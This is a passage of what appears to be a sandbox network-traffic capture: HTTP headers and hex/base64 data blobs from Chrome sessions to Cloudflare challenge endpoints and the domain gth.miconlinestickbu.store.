                                    2024-05-22 15:09:09 UTC1369INData Raw: 2f 72 37 4e 37 6a 48 75 57 6c 70 69 32 68 48 32 55 75 72 76 50 6a 37 2b 2f 68 5a 7a 42 30 72 58 56 30 73 2f 53 7a 61 75 59 74 63 2b 73 77 4c 6a 56 78 5a 2b 38 32 63 6d 68 34 2b 58 47 34 4c 2f 78 34 73 58 69 72 71 33 33 78 36 37 4a 73 2b 54 45 72 2b 33 56 33 37 67 42 37 74 54 43 33 4e 50 65 33 38 6a 48 7a 41 7a 4f 38 4e 7a 64 45 2b 62 67 36 63 7a 30 47 68 6f 46 44 77 76 78 36 65 6b 4c 39 76 37 79 41 67 45 62 34 41 72 6a 4c 43 77 61 4a 69 51 6e 2b 53 67 6a 2f 68 34 41 39 69 59 6c 4b 77 55 78 43 43 30 35 45 69 41 4b 47 7a 45 55 4e 45 59 5a 4a 6b 6b 59 4e 68 38 6c 49 6b 6b 5a 48 68 4d 75 4b 6b 4a 4e 52 55 49 56 46 69 30 56 4e 54 45 66 55 31 6f 35 51 6c 6f 67 49 43 4e 69 5a 44 6f 39 4e 6a 64 4e 51 47 59 74 57 30 38 39 5a 6b 6c 33 4e 30 35 78 58 55 35 4a 4e 31
                                    Data Ascii: /r7N7jHuWlpi2hH2UurvPj7+/hZzB0rXV0s/SzauYtc+swLjVxZ+82cmh4+XG4L/x4sXirq33x67Js+TEr+3V37gB7tTC3NPe38jHzAzO8NzdE+bg6cz0GhoFDwvx6ekL9v7yAgEb4ArjLCwaJiQn+Sgj/h4A9iYlKwUxCC05EiAKGzEUNEYZJkkYNh8lIkkZHhMuKkJNRUIVFi0VNTEfU1o5QlogICNiZDo9NjdNQGYtW089Zkl3N05xXU5JN1
                                    2024-05-22 15:09:09 UTC1369INData Raw: 70 72 32 46 68 37 62 42 6e 73 71 33 69 62 32 6b 76 73 79 6d 69 4b 33 46 6c 4e 76 52 7a 61 79 38 73 4a 66 63 74 62 6d 66 33 36 53 36 30 71 6d 39 78 61 58 44 31 2b 58 78 33 63 6a 45 72 62 54 33 37 4c 48 7a 73 4d 36 34 76 64 7a 56 39 4c 77 44 31 76 58 39 32 66 58 34 41 65 45 43 41 51 51 4c 41 41 62 78 45 77 6b 4c 2f 65 6b 4f 44 42 62 7a 30 64 6a 5a 2f 50 45 57 33 4f 41 53 45 69 48 37 33 79 72 6f 34 41 4d 74 4b 4f 67 44 4d 69 77 30 44 4f 30 4d 45 67 2f 78 44 79 67 62 50 68 4a 41 45 55 49 57 52 42 73 42 47 67 45 67 53 68 38 34 49 55 35 49 43 53 52 52 50 41 6c 47 56 6b 46 45 4c 6c 6f 61 4a 6a 51 56 48 56 77 78 59 6b 34 2b 51 32 56 67 48 55 63 69 50 6d 42 44 62 57 67 70 59 6e 49 78 63 45 77 75 53 32 52 4a 4d 45 39 6f 57 33 35 71 57 6c 61 43 56 6f 42 5a 68 59 42
                                    Data Ascii: pr2Fh7bBnsq3ib2kvsymiK3FlNvRzay8sJfctbmf36S60qm9xaXD1+Xx3cjErbT37LHzsM64vdzV9LwD1vX92fX4AeECAQQLAAbxEwkL/ekODBbz0djZ/PEW3OASEiH73yro4AMtKOgDMiw0DO0MEg/xDygbPhJAEUIWRBsBGgEgSh84IU5ICSRRPAlGVkFELloaJjQVHVwxYk4+Q2VgHUciPmBDbWgpYnIxcEwuS2RJME9oW35qWlaCVoBZhYB
                                    2024-05-22 15:09:09 UTC1369INData Raw: 59 69 6b 30 4c 79 64 71 4a 43 70 6b 4b 37 5a 72 64 75 79 33 63 66 66 74 65 44 4c 31 39 58 6c 70 62 47 2b 36 64 54 58 77 2b 33 42 72 4d 50 78 37 63 33 4a 39 4e 2f 72 7a 50 6e 4f 36 39 50 38 35 2f 66 56 76 4e 57 34 32 41 58 46 38 2b 66 41 79 4d 54 69 44 73 33 37 41 68 49 4d 44 4f 76 4c 36 67 6a 74 47 68 55 49 38 52 37 7a 2b 66 49 69 48 52 54 30 4a 68 41 6f 2b 53 6f 55 4b 42 34 75 37 43 77 45 4d 76 41 30 42 2b 7a 30 39 41 34 35 38 78 49 75 4b 68 4d 55 39 54 49 34 41 44 45 34 39 7a 67 61 53 69 41 34 50 6a 6b 41 4b 41 30 4a 4d 7a 51 4d 51 68 59 71 4d 6c 6b 4d 4c 6a 42 64 55 7a 55 38 47 43 45 5a 4f 68 34 38 4f 6b 68 70 56 55 5a 49 62 6d 68 77 59 56 34 79 63 45 6c 32 63 6c 46 57 5a 47 5a 71 4d 6a 6c 6f 65 46 51 34 66 56 5a 6a 51 49 43 49 58 45 46 66 5a 6d 42 49
                                    Data Ascii: Yik0LydqJCpkK7Zrduy3cffteDL19XlpbG+6dTXw+3BrMPx7c3J9N/rzPnO69P85/fVvNW42AXF8+fAyMTiDs37AhIMDOvL6gjtGhUI8R7z+fIiHRT0JhAo+SoUKB4u7CwEMvA0B+z09A458xIuKhMU9TI4ADE49zgaSiA4PjkAKA0JMzQMQhYqMlkMLjBdUzU8GCEZOh48OkhpVUZIbmhwYV4ycEl2clFWZGZqMjloeFQ4fVZjQICIXEFfZmBI


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.449791104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:10 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:10 UTC375INHTTP/1.1 404 Not Found
                                    Date: Wed, 22 May 2024 15:09:10 GMT
                                    Content-Type: application/json
                                    Content-Length: 7
                                    Connection: close
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    cf-chl-out: upV0u8LWBx9GG+Y4JnyFXw==$Nr7rovYGjbl54dOQs4y8Uw==
                                    Server: cloudflare
                                    CF-RAY: 887db9cb895e1931-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                    Data Ascii: invalid


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.449792104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:20 UTC918OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 34751
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    Content-type: application/x-www-form-urlencoded
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    CF-Challenge: e2c69a9cf6a5b67
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://challenges.cloudflare.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:20 UTC16384OUTData Raw: 76 5f 38 38 37 64 62 39 39 36 32 39 34 34 37 38 65 31 3d 43 69 54 6a 56 2d 55 52 57 2d 57 32 54 2d 61 77 41 32 54 6a 43 38 32 4a 5a 61 76 55 35 77 4e 6a 32 69 5a 41 77 6a 4b 38 2d 39 2d 47 54 77 43 2d 77 35 57 2d 41 77 5a 6a 61 54 5a 6f 77 59 32 2d 77 31 69 55 73 77 61 64 6b 38 77 74 76 38 77 67 25 32 62 75 6c 4c 44 77 59 6a 32 36 76 77 42 39 5a 4b 77 36 44 48 6a 77 64 77 2d 4e 34 64 61 6f 66 72 2d 77 62 32 34 39 61 77 30 6a 32 45 61 77 4a 72 67 4c 38 77 55 44 6a 55 45 4a 77 55 45 55 77 35 51 4d 77 32 39 77 37 61 38 55 37 2b 51 6e 55 50 4a 68 39 6a 55 43 38 44 41 44 4e 6a 77 79 55 52 50 4d 38 57 37 32 48 77 34 61 47 36 4c 47 2b 77 77 6b 78 36 6a 55 5a 7a 4d 4a 30 6a 59 53 77 61 51 75 48 38 4c 66 34 2b 61 37 44 6a 4a 67 66 6d 49 32 35 48 6d 74 71 51 54 37
                                    Data Ascii: v_887db996294478e1=CiTjV-URW-W2T-awA2TjC82JZavU5wNj2iZAwjK8-9-GTwC-w5W-AwZjaTZowY2-w1iUswadk8wtv8wg%2bulLDwYj26vwB9ZKw6DHjwdw-N4daofr-wb249aw0j2EawJrgL8wUDjUEJwUEUw5QMw29w7a8U7+QnUPJh9jUC8DADNjwyURPM8W72Hw4aG6LG+wwkx6jUZzMJ0jYSwaQuH8Lf4+a7DjJgfmI25HmtqQT7
                                    2024-05-22 15:09:20 UTC16384OUTData Raw: 6d 53 6a 4d 77 77 45 36 65 64 34 55 48 77 77 55 2b 55 6a 55 48 5a 38 4c 41 55 31 39 4d 77 5a 6a 55 67 77 73 69 4a 37 6b 70 65 4c 63 4a 53 4c 55 77 37 65 78 65 47 37 38 36 39 59 70 4f 4a 77 32 77 5a 69 77 47 77 4a 54 59 38 77 69 65 62 44 77 54 77 4f 77 41 38 59 4d 55 74 77 74 63 56 4e 77 6f 77 35 38 77 4a 55 45 4a 30 38 2d 38 77 68 77 77 6a 61 4d 55 45 69 37 38 2d 49 77 69 54 54 39 55 61 77 6c 77 37 52 34 49 77 56 35 61 53 4a 69 77 54 39 30 52 55 77 55 6a 2b 41 4f 78 38 68 34 77 7a 38 5a 66 55 66 2b 7a 6a 31 4a 68 57 2b 7a 6a 4a 4e 77 69 77 7a 6a 4a 50 77 4f 39 50 6a 50 43 55 59 77 41 53 59 6d 55 72 65 59 6a 5a 69 55 33 33 5a 79 78 77 55 4b 77 71 57 2d 4d 77 2d 77 2b 2d 34 34 4d 58 48 71 59 56 39 55 79 50 50 4a 34 4d 6e 61 77 34 36 2d 56 4e 41 33 7a 67 4a
                                    Data Ascii: mSjMwwE6ed4UHwwU+UjUHZ8LAU19MwZjUgwsiJ7kpeLcJSLUw7exeG7869YpOJw2wZiwGwJTY8wiebDwTwOwA8YMUtwtcVNwow58wJUEJ08-8whwwjaMUEi78-IwiTT9Uawlw7R4IwV5aSJiwT90RUwUj+AOx8h4wz8ZfUf+zj1JhW+zjJNwiwzjJPwO9PjPCUYwASYmUreYjZiU33ZyxwUKwqW-Mw-w+-44MXHqYV9UyPPJ4Mnaw46-VNA3zgJ
                                    2024-05-22 15:09:20 UTC1983OUTData Raw: 4d 32 6d 5a 78 6c 69 68 73 66 55 55 69 4c 33 54 6c 39 62 4a 5a 78 31 4a 70 6a 34 4d 6b 4f 6d 54 73 47 79 51 37 4a 70 7a 77 5a 74 53 49 6f 2d 67 47 54 55 69 44 72 69 52 38 2d 4d 55 33 52 6e 48 45 41 48 74 6a 75 76 24 79 34 73 2b 52 73 33 42 41 72 47 6d 49 72 4b 55 71 41 47 66 62 6a 4f 39 6e 6d 62 55 73 4b 54 6a 37 39 61 34 51 24 6d 32 76 32 6d 55 6e 77 4a 6f 55 49 38 4a 77 5a 72 50 61 77 6e 6a 4a 54 59 53 4f 49 77 76 57 54 74 6f 24 77 36 58 50 42 56 50 57 6d 72 4f 24 56 34 55 65 58 61 4e 55 69 65 61 34 54 48 56 6b 77 34 34 37 38 4c 34 71 6d 74 49 4c 56 53 4e 67 34 35 4a 77 69 41 34 57 37 4a 77 38 6a 4c 24 61 4e 77 53 54 24 4e 4a 70 7a 6e 77 72 77 33 64 44 6b 4e 24 57 4a 74 70 24 45 45 72 50 5a 6d 53 77 36 79 43 6d 55 36 77 52 58 63 69 55 72 6a 73 30 35 62
                                    Data Ascii: M2mZxlihsfUUiL3Tl9bJZx1Jpj4MkOmTsGyQ7JpzwZtSIo-gGTUiDriR8-MU3RnHEAHtjuv$y4s+Rs3BArGmIrKUqAGfbjO9nmbUsKTj79a4Q$m2v2mUnwJoUI8JwZrPawnjJTYSOIwvWTto$w6XPBVPWmrO$V4UeXaNUiea4THVkw4478L4qmtILVSNg45JwiA4W7Jw8jL$aNwST$NJpznwrw3dDkN$WJtp$EErPZmSw6yCmU6wRXciUrjs05b
                                    2024-05-22 15:09:20 UTC1321INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 3564
                                    Connection: close
                                    cf-chl-out: UucNEATiKDGcRSppwBJAdwUh7zD39VQhPeSz3vqpQldKdU4fxmILfx5CvcPlpm+1E59fzO0sFFePP9mB8KJEkebaGRmrFGjfb7mkrc6S2GhbCgf1AEPupUxMHEmmAf6q$aMavQsG3S4Is1NEqR8nDqQ==
                                    cf-chl-out-s: aqH3m46e9tneBpDsLhJ0QERpELRkmpZ1aVft2EjQpl0oYEoVrcZ9PHdbvQdGF3PoOiNioIwWVRXdcpaIH3VAHXERahM394HEsTTdo2KJswAFe6oW9Io9wNDzXO2d3XLx5xQhg7OAgkEfg2jcCpbDjWuDuNrtlKyuBnCCE7/g73yYycr3QEBpcrIwCLTJZvEW3kXWWhcgr3TUpVZ2EfCAtnqrzr5JF9KaqtBUulFv7omWSYe0YTgSYORdxXX/Uwztsu6kLonHFmOR5kpOwhT+NnqbNR5RpLW6KfYsKvDpXhV0EN+A3i9N8KjGM0PEL6euJGAuwUrIah19Y0j0CszetLfK6QS9+4s1GJnuY/FKr+r/bIJgYAHYI5DYlvs2Q+pu/Kgenx8Cw1rhEeE/DUhizM0D5tC3QT/f9XqyoyocrOk4jazXmTNA44igbmDA0IHxwXEKCxVNdE1eBBKNspXbLbcbcj/KLmcr/WFX65bXcKgcnSOYTJsW/jXyf0snEZ+1ynruxsnVDFNJzaHx7k80B8gB6uS8uD9zc5R9B/k1pTw1Dv2SSPYFZciJI2RQ4KgRTmkDojQlXKpQNNDetjzjEN+ZD+0/vezxWGWxDGgotlYlK85BjvsknQtWUGE1XHLNgusLTCi7pIdE4RqR7SK6y2GVMwGhfY/d17ndoZnZvIZZqflpZMvLZ2ch3H2CBcTAWucTx+Ag7mKJTfXZh5wTX3kO/0ykZAd5zIKXsCze9Gq/S+Kqqorl9nmubtJA0HjKrJv8K9wdsjj74/KXYL/o/Wx2lquvphi0rdH7cmmdfv8KNPm9CGwuHXYlpkudWvgM6C03AuIBDaOzqwC+5zRE+8sLWDhV/ll2YR9g02mYwV0RkX7sDXRZvo0b0vZL5Whf$64Fuo1gEKDJ5d+BvFgBTqA==
                                    Server: cloudflare
                                    CF-RAY: 887dba0b6b245e7d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:20 UTC48INData Raw: 54 55 31 50 69 49 46 75 68 49 39 59 63 59 53 5a 5a 6c 65 41 63 35 68 74 57 58 53 67 5a 59 2b 70 6f 61 53 46 6e 6f 43 6b 6e 70 6c 71 68 6f 46 75
                                    Data Ascii: TU1PiIFuhI9YcYSZZleAc5htWXSgZY+poaSFnoCknplqhoFu
                                    2024-05-22 15:09:20 UTC1369INData Raw: 72 6e 57 56 70 36 6d 4c 6d 4b 71 72 69 4a 36 33 66 37 4b 69 75 34 57 64 74 62 75 4a 74 38 6d 55 72 5a 36 6a 7a 73 4b 71 69 73 57 6c 6e 34 37 46 70 61 4b 76 79 72 47 73 73 62 69 31 32 36 36 78 34 38 2b 64 74 74 75 38 75 4d 54 58 6f 4f 47 39 72 36 54 73 73 4b 75 75 76 2b 57 77 30 4c 76 7a 36 72 6a 4a 32 4f 2b 39 37 72 72 30 35 4d 63 48 77 4e 50 4a 35 4d 7a 63 45 4e 33 35 38 64 30 4b 41 38 38 4c 45 41 62 55 30 39 4c 55 35 39 6e 34 34 42 6a 6a 49 52 50 68 43 53 66 30 48 2b 59 6f 41 68 6f 78 49 67 41 46 4c 78 41 50 46 44 63 42 47 43 67 52 44 2f 51 35 4e 52 59 37 2b 77 45 52 39 78 31 46 50 30 51 33 47 43 41 49 52 51 77 6d 4c 6a 78 53 52 51 38 74 55 45 46 4c 4b 6c 78 4e 57 55 35 49 49 56 34 36 4a 46 6c 46 4c 30 4a 48 61 6b 59 34 62 43 63 76 51 55 4d 2f 62 6c 4e
                                    Data Ascii: rnWVp6mLmKqriJ63f7Kiu4WdtbuJt8mUrZ6jzsKqisWln47FpaKvyrGssbi1266x48+dttu8uMTXoOG9r6TssKuuv+Ww0Lvz6rjJ2O+97rr05McHwNPJ5MzcEN358d0KA88LEAbU09LU59n44BjjIRPhCSf0H+YoAhoxIgAFLxAPFDcBGCgRD/Q5NRY7+wER9x1FP0Q3GCAIRQwmLjxSRQ8tUEFLKlxNWU5IIV46JFlFL0JHakY4bCcvQUM/blN
                                    2024-05-22 15:09:20 UTC1369INData Raw: 5a 69 34 6b 6e 32 78 76 72 71 42 6c 36 2b 46 79 4b 6d 46 6e 70 71 66 79 36 50 4c 30 4d 37 4e 6a 61 71 52 72 4b 61 70 31 4b 36 35 6d 64 32 64 74 71 76 67 74 73 44 68 6e 62 6d 6a 34 2b 69 6b 78 4f 6e 57 36 4d 62 6d 71 4d 54 72 71 39 33 79 30 50 58 33 35 74 47 34 74 64 37 71 39 37 6a 37 33 74 67 47 32 72 33 2b 42 64 77 42 32 67 6e 69 37 75 72 4c 44 77 58 68 44 77 4c 4e 43 64 4d 56 7a 64 4c 5a 37 4e 6a 64 48 39 76 68 46 53 66 30 34 43 41 6f 36 69 45 4b 35 79 6b 73 37 53 37 77 35 54 50 78 39 69 77 31 4e 44 59 53 2b 53 66 39 4c 44 2f 34 50 52 4d 62 52 44 38 42 41 44 55 62 4e 53 70 47 4f 52 38 61 50 42 49 66 4d 6b 55 57 57 53 5a 44 56 52 59 77 46 30 67 61 53 56 73 68 59 54 4d 69 4a 47 68 6b 57 56 39 66 61 6c 64 4e 4d 47 6c 62 62 54 34 7a 59 45 56 7a 64 6d 4a 5a
                                    Data Ascii: Zi4kn2xvrqBl6+FyKmFnpqfy6PL0M7NjaqRrKap1K65md2dtqvgtsDhnbmj4+ikxOnW6MbmqMTrq93y0PX35tG4td7q97j73tgG2r3+BdwB2gni7urLDwXhDwLNCdMVzdLZ7NjdH9vhFSf04CAo6iEK5yks7S7w5TPx9iw1NDYS+Sf9LD/4PRMbRD8BADUbNSpGOR8aPBIfMkUWWSZDVRYwF0gaSVshYTMiJGhkWV9faldNMGlbbT4zYEVzdmJZ
                                    2024-05-22 15:09:20 UTC778INData Raw: 47 56 67 4d 4f 46 73 73 6d 44 78 59 6a 46 74 34 79 59 79 72 71 36 69 61 61 4d 30 59 33 4e 30 36 32 56 71 39 61 79 31 35 65 64 6c 4d 76 6b 6e 64 44 63 75 75 48 6d 78 5a 37 63 72 61 6d 39 32 74 72 30 79 66 47 76 72 65 62 6a 30 4d 72 57 39 62 44 57 36 37 33 2b 36 39 50 41 41 75 51 42 43 4d 50 46 39 41 76 4e 33 74 6a 37 7a 78 48 31 2f 75 72 4a 47 64 55 45 47 65 67 47 2f 67 33 78 33 4e 7a 36 45 53 59 52 49 66 4c 69 34 2b 6b 57 4b 78 72 34 4c 6a 4d 64 42 77 49 78 42 54 44 34 38 41 37 78 42 66 67 55 2f 45 48 39 50 44 39 47 4c 6a 4d 5a 52 41 49 65 4a 79 4d 4a 44 51 31 4e 55 67 30 72 4b 51 39 44 4d 79 4a 61 47 69 64 47 57 46 67 65 54 47 4e 66 50 31 52 6d 55 45 4d 32 5a 6d 56 70 4f 47 77 75 53 7a 35 62 4d 30 34 6e 58 32 46 6a 4d 47 4d 30 4f 6b 67 37 56 45 70 35 66
                                    Data Ascii: GVgMOFssmDxYjFt4yYyrq6iaaM0Y3N062Vq9ay15edlMvkndDcuuHmxZ7cram92tr0yfGvrebj0MrW9bDW673+69PAAuQBCMPF9AvN3tj7zxH1/urJGdUEGegG/g3x3Nz6ESYRIfLi4+kWKxr4LjMdBwIxBTD48A7xBfgU/EH9PD9GLjMZRAIeJyMJDQ1NUg0rKQ9DMyJaGidGWFgeTGNfP1RmUEM2ZmVpOGwuSz5bM04nX2FjMGM0Okg7VEp5f


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.449793104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:21 UTC1089OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    Content-Length: 3372
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    Content-type: application/x-www-form-urlencoded
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    CF-Challenge: 18215035ea345db
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://gth.miconlinestickbu.store
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://gth.miconlinestickbu.store/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:21 UTC3372OUTData Raw: 76 5f 38 38 37 64 62 39 38 32 32 66 35 33 38 63 34 31 3d 54 70 24 77 42 62 78 46 55 62 55 32 24 62 6c 30 68 32 24 77 32 70 65 79 78 68 30 31 30 5a 77 68 49 30 45 39 30 4e 77 24 70 30 4c 30 61 62 30 34 75 77 34 74 30 45 77 30 70 34 62 30 37 77 78 63 75 77 78 67 30 68 44 78 4f 78 45 30 34 53 48 47 30 33 6b 55 30 77 77 78 4c 30 33 4f 30 2d 63 51 30 53 48 73 5a 30 75 77 4a 55 30 57 67 67 2d 30 7a 65 64 4f 79 30 38 30 32 52 4e 45 30 62 49 65 59 30 55 77 24 30 5a 33 4a 42 75 30 39 48 58 31 55 59 59 34 44 73 44 4a 38 41 30 68 70 30 37 34 57 41 65 24 49 30 43 77 62 74 43 30 34 59 30 35 5a 65 69 4a 30 30 4f 34 63 77 30 4a 48 6c 43 67 24 46 73 73 24 32 69 24 5a 6c 59 31 55 41 63 68 6a 6e 30 30 49 30 36 31 52 77 48 7a 73 68 30 33 38 44 30 32 44 30 70 77 30 48 74 56
                                    Data Ascii: v_887db9822f538c41=Tp$wBbxFUbU2$bl0h2$w2peyxh010ZwhI0E90Nw$p0L0ab04uw4t0Ew0p4b07wxcuwxg0hDxOxE04SHG03kU0wwxL03O0-cQ0SHsZ0uwJU0Wgg-0zedOy0802RNE0bIeY0Uw$0Z3JBu09HX1UYY4DsDJ8A0hp074WAe$I0CwbtC04Y05ZeiJ00O4cw0JHlCg$Fss$2i$ZlY1UAchjn00I061RwHzsh038D02D0pw0HtV
                                    2024-05-22 15:09:21 UTC1280INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4288
                                    Connection: close
                                    cf-chl-out-s: d2pazUI1Wkr0q4URn9bWFTJ3cY7Si9C3adQlH+PGPgMxVgcDVfW1dISmHHHklVBO3VcdgfVv1+yRDur7zDdsHHq5aELhDOiXcYHgBQ26ltHrI1zqgV2u95V446nBnnzKiEYC6MHVzCvGbiM1+/Mp9DIoUm+c2mQwoq+hSzrEMggNz3oMxkxhzUj/28/iI5WAlY78byjngIm/Rbywg2V66WGpINDH1tX2eaACrUYysg+h2fqZKSkglpYu4gi0++QF9BwpeKTcd00eP1HvtlMF7ig4m6rCdnabMzdd9LjkQB1/pqZMzXihOfQZItg9nUko/saFo4oUO2aqJAM1XyS+cVNjA8AOQLzHljysGK1jea9+4Bd9R2fmAANvHiEOw2EXVj/8v8q4g/KzxEgMppdXxZfjIb2SpMbxHq7lOGoNt4wvJ1w1fl7D1frbGWej6wt+KdZTA5gJ9o5hBuMFMzC1ng==$rtqXBSK6WipoAKnyN+PpNA==
                                    cf-chl-out: KVkvvnfAV0itEp1iVLnCUODNtShFTxEvsxFFijhr4HkJeHh9NqKK9YLdtHbzj47+Z0PgfNWotWi7UsrQW8sNkQ==$Aw5y7jt88dMRyCN3vb/2eQ==
                                    set-cookie: cf_chl_rc_m=;Expires=Tue, 21 May 2024 15:09:21 GMT;SameSite=Strict
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDNd92nbxblVrx6SAGis%2Fatuke9qGGbMb4WkdQ5JrNEn5RxNg0grxg4fVOdkQDHYnYcA1nCUoJ9ckAYk%2F%2BUbn0QXVDDyfJOALqVxpYDMnKJhkGefz9vhW5SslCFKY6EA4pISCPhoMpyyEikdNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba109b1d434a-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:21 UTC89INData Raw: 6b 35 61 31 6a 33 6d 64 65 4c 71 6a 74 34 32 34 72 37 4b 44 76 34 4b 42 72 62 75 34 77 35 36 6e 73 72 47 68 77 73 48 4c 6d 4d 6d 36 75 71 2f 65 74 64 69 6f 76 63 4b 66 30 4d 2f 47 6f 39 53 2f 33 4e 2f 43 79 4e 33 6c 35 74 75 2b 30 4b 7a 42 39 72 62 4c 78 37 54 50 31
                                    Data Ascii: k5a1j3mdeLqjt424r7KDv4KBrbu4w56nsrGhwsHLmMm6uq/etdiovcKf0M/Go9S/3N/CyN3l5tu+0KzB9rbLx7TP1
                                    2024-05-22 15:09:21 UTC1369INData Raw: 39 48 38 36 76 76 53 2f 74 2f 6c 2b 38 44 7a 78 76 72 45 77 65 66 2b 31 73 45 53 41 38 2f 46 36 77 37 57 35 65 72 4c 37 74 62 62 42 75 6a 33 45 77 44 74 49 77 54 6b 38 67 48 34 2f 76 63 4e 47 41 6f 6f 39 77 4d 4b 49 52 51 64 43 79 51 51 41 67 55 33 46 52 62 7a 4d 42 41 58 47 67 34 78 51 52 41 5a 42 41 5a 44 51 41 6b 33 51 69 45 50 42 77 6f 38 53 53 70 4a 50 30 78 4f 57 54 77 31 50 54 30 74 4b 55 41 69 50 7a 56 44 51 7a 59 6d 49 53 41 30 4b 30 51 36 4e 79 78 79 55 33 4a 4d 51 55 46 53 64 55 31 6a 4f 33 51 76 65 30 68 65 62 54 31 35 5a 48 5a 44 65 49 56 78 69 6f 56 35 58 6f 57 4c 66 59 68 71 69 57 42 78 64 35 69 43 53 32 53 51 58 49 57 50 6a 33 64 2f 6c 6d 4e 78 6c 33 39 30 5a 32 53 6b 6d 57 4a 38 5a 47 79 65 6d 71 75 50 6c 61 43 69 69 62 69 79 6c 4c 4f 34
                                    Data Ascii: 9H86vvS/t/l+8DzxvrEwef+1sESA8/F6w7W5erL7tbbBuj3EwDtIwTk8gH4/vcNGAoo9wMKIRQdCyQQAgU3FRbzMBAXGg4xQRAZBAZDQAk3QiEPBwo8SSpJP0xOWTw1PT0tKUAiPzVDQzYmISA0K0Q6NyxyU3JMQUFSdU1jO3Qve0hebT15ZHZDeIVxioV5XoWLfYhqiWBxd5iCS2SQXIWPj3d/lmNxl390Z2SkmWJ8ZGyemquPlaCiibiylLO4
